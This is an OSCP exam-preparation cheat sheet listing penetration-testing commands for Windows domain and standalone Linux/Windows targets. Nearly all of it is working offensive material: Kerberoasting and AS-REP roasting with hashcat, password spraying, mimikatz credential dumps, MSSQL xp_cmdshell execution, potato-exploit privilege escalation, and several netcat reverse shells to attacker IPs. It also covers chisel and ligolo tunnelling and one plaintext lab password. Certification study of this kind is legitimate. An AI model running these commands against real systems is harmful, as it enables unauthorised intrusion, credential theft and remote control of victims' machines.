OSCP

🖥️ MS01

🚀 PE

• Check user's privileges

• SeImpersonatePrivilege → escalate to LA

# List current user's privileges
whoami /priv

• Look for custom binaries

• strings locally

• Binary/DLL hijacking

• Enumerate domain users and build a wordlist

$ nxc smb <target> -u <user> -p <pass> --users | awk '$1 == "SMB" && $5 != "[+]" && $5 != "-Username-" && $5 != "[*]" && $5 != "Guest" && $5 != "krbtgt" {print $5}' > domain_users

• Enumerate SMB shares

nxc smb 192.168.X.X -u <user> -p <pass> --shares

• Check for AS-REP Roasting

# AS-REPRoast
impacket-GetNPUsers oscp.exam/ -dc-ip 10.10.X.X -no-pass -usersfile domain_users

# Crack obtained hashes
hashcat -m 18200 asreproast_users /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

• Check for Kerberoasting

# Kerberoast
impacket-GetUserSPNs -request -dc-ip 10.10.X.X oscp.exam/<user>

# Crack obtained hashes
hashcat -m 13100 kerberoast_users /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

• If sql_svc → interact directly

# impacket
mssqlclient.py <domain>/<user>@<host> -windows-auth
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';

# Remote queries
nxc mssql <target> -u <user> -p <pass> --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'
# System RCE via xp_cmdshell
nxc mssql <target> -u <user> -p <pass> --local-auth -x whoami

• Password spray for lateral movement, PE, and remote access

# Pass-spray for lateral movement/PE (local auth)
nxc smb domain_ips -u domain_users -p passwords --continue-on-success --local-auth | grep +

# Pass-spray for lateral movement/PE
nxc smb domain_ips -u domain_users -p passwords --continue-on-success | grep +

# Pass-spray for WinRM access
nxc winrm domain_ips -u domain_users -p passwords --continue-on-success | grep +

# Pass-spray for RDP access
nxc rdp domain_ips -u domain_users -p passwords --continue-on-success | grep +

• Collect domain data

# Netexec
nxc ldap <dc-ip/FQDN> -u <user> -p <password> --bloodhound -c All --dns-server <dc-ip>

# Bloodhound-python
bloodhound-python -u <user> -p <password> -dc <FQDN> -c all -d <domain> -ns <dc-ip>
bloodhound-python -u <user> --hashes :<NTML> -dc <FQDN> -c all -d <domain> -ns <dc-ip>

🔎Pillaging

• Dump cached credentials

# Dump active sessions' creds
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

# Dump the SAM registry hive
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

# Dump the LSA secrets
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"

• Check PowerShell history

#Check host type
$Host.Name

# Check the PS history of the current user
(Get-PSReadlineOption).HistorySavePath

# Check the PS history of another user
Get-Content C:\Users\<user>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

🖧 Pivot

• Start the server on the attacking host

# Start proxy
sudo ligolo-proxy -selfcert

# Create the interface
ligolo-ng » interface_create --name ligolo

• Start the agent on the pivot host

# Connect to the proxy
.\agent.exe -connect 192.168.X.X:11601 -ignore-cert

• Set up routing on the attacking host

# List active sessions
ligolo-ng » session

# Add route
ligolo-ng » interface_add_route --name ligolo --route 172.16.10.0/24

# Start the tunnel
ligolo-ng » start

🖥️ MS02

🚀 PE

• Connect via WinRM or RDP

# Connect via WinRM
evil-winrm -u <user> -p <pass> -i <MS02>

# Connect via RDP
xfreerdp /u:<user> /p:<pass> /v:<MS02> /smart-sizing

• Check user's privileges

# List current user's privileges
whoami /priv

# SigmaPotato
uv run nxc mssql <target-IP> -u <user> -p <pass> --local-auth --put-file SigmaPotato.exe C:\\Windows\\Temp\\sp.exe

uv run nxc mssql <target-IP> -u <user> -p <pass> --local-auth -x "c:\windows\temp\sp.exe --revshell 10.10.14.5 53"

# PrintSpoofer
uv run nxc mssql <target-IP> -u <user> -p <pass> --local-auth --put-file PrintSpoofer64.exe C:\\Windows\\Temp\\pf.exe

uv run nxc mssql <target-IP> -u <user> -p <pass> --local-auth --put-file ../binaries/nc.exe C:\\Windows\\Temp\\nc.exe

uv run nxc mssql <target-IP> -u <user> -p <pass> --local-auth -x 'c:\windows\temp\pf.exe -c "nc.exe 10.10.14.10 53 -e cmd"'

# GodPotato
uv run nxc mssql <target-IP> -u <user> -p <pass> --put-file ../../tools/privesc/GodPotato-NET4.exe C:\\windows\\temp\\gp.exe

uv run nxc mssql <target-IP> -u <user> -p <pass> --local-auth --put-file ../binaries/nc.exe C:\\Windows\\Temp\\nc.exe

uv run nxc mssql <target-IP> -u <user> -p <pass> -x 'c:\windows\temp\gp.exe -cmd "c:\windows\temp\nc.exe -t -e C:\windows\system32\cmd.exe 192.168.45.164 80"'

• Check SMB access

nxc smb 192.168.X.X -u <user> -p <pass> --shares

• Check for C:\windows.old

• Dump SAM and SYSTEM locally

# Download files with nxc
$ uv run nxc mssql <target-IP> -u sql_svc -p <pass> --get-file "c:\windows.old\windows\System32\SYSTEM" ./SYSTEM

$ uv run nxc mssql <target-IP> -u sql_svc -p <pass> --get-file "c:\windows.old\windows\System32\SAM" ./SAM

# Dump SAM's hashes
impacket-secretsdump -sam SAM -system SYSTEM LOCAL

# Read flag
$ nxc smb dc01 -u tom_admin -H <hash> -X "type c:\users\administrator\desktop\proof.txt"

• Look for custom binaries

• strings locally

• Binary/DLL hijacking

• Check for locally active sockets

# List active sockets
netstat -ano

• Port Forward

# Start server on the attacking host
$ ./chisel server -p 8000 --reverse

# Tranfer binary
wget http://192.168.X.X:8888/chisel.exe -o chisel.exe

# Start client on target
# 3306 (target port) to 6033 (local port) 
.\chisel.exe client 192.168.X.X:8000 R:6033:127.0.0.1:3306

# Interact from attacking host
$ mysql -h 127.0.0.1 -P 6033 -u root

• Check PowerShell history

# Check the PS history of the current user
Get-Content (Get-PSReadlineOption).HistorySavePath

# Check the PS history of another user
Get-Content C:\Users\<user>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

• Password spray for potential PE (DA/LA on the DC)

# Pass-spray for PE (local auth)
nxc smb <dc-ip> -u domain_users -p passwords --continue-on-success --local-auth | grep +

# Pass-spray for PE
nxc smb <dc-ip> -u domain_users -p passwords --continue-on-success | grep +

• Reverse Port Forward

# Add a listener to MS01 from Kali
[Agent : OSCP\eric.wallows@MS01] » listener_add --addr 0.0.0.0:4444 --to 0.0.0.0:4444

# Upload binary to MS02
$ nxc mssql ms02 -u sql_svc -p Dolphin1 --put-file 'nc.exe' 'c:\windows\temp\nc.exe'

# Execute the binary from MS02 pointing to MS01
$ nxc mssql ms02 -u sql_svc -p Dolphin1 -x 'c:\windows\temp\nc.exe 10.10.63.147 4444 -e cmd.exe'

🖥️ Standalones

Make sure to port scan twice if you can't see a path!

🦶 Foothold

• Port scan

• TCP → manual probe/google "weird" ports, tech versions → PoC

$ nc -nv 192.168.X.X <port>
# help
# version

• UDP → SNMP → repeated strings, usernames, creds, hints

# Enumerate public strings
snmpwalk -v2c -c public <target>

# Enumerate user-related strings
snmpwalk -v2c -c public <target> 1.3.6.1.4.1

# Grep-based enumeration
snmpwalk -v2c -c public <target> | grep -Ei 'user|admin|name|passwd'

• Dirbust HTTP ports (don't forget file extensions)

• Check dirs for tech versions → PoC

• Check file's metadata → usernames → weak creds (bob:bob)

• Look out for .git repos → creds for remote access

# Dump the git repository locally
$ git-dumper http://192.168.X.X/.git/ ./<local-dir>

# Write all commits to a file
$ git log | grep commit | cut -d " " -f2 | xargs git show > commits

🚀 PE

• Check access

sudo -l

# List user's privileges (Windows)
whoami /priv

• Run PE scripts → Binary/DLL hijacking

# Transfer binary (Linux)
wget http://192.168.X.X:8888/linpeas.sh -o linpeas.sh

# Transfer binary (Windows)
wget http://192.168.X.X:8888/winPEASx64.exe -o winpeas.exe

• Check SUIDs → GTFOBins/PoC

find / -type f -perm -u=s 2>/dev/null

• Kernel version → PoC

# List kernel information
uname -a

# List system information (Windows)
systeminfo

• Look for non-default files

• Check for locally active sockets

# List active sockets
ss -tunlp

# Identify what the port is doing
lsof -i :8000
ps aux | grep 8000

# List active sockets (Windows)
netstat -ano

• Port forward

# Start server on the attacking host
$ ./chisel server -p 8000 --reverse

# Tranfer binary
wget http://192.168.X.X:8888/chisel -o chisel

# Start client on target
# 3306 (target port) to 6033 (local port) 
./chisel client 192.168.X.X:8000 R:6033:127.0.0.1:3306

# Interact from attacking host
$ mysql -h 127.0.0.1 -P 6033 -u root

• Check running processes/jobs → cronjobs

# Transfer binary
wget http://192.168.X.X:8888/pspy32 -o pspy32

# Enumerate running processes/jobs
./pspy32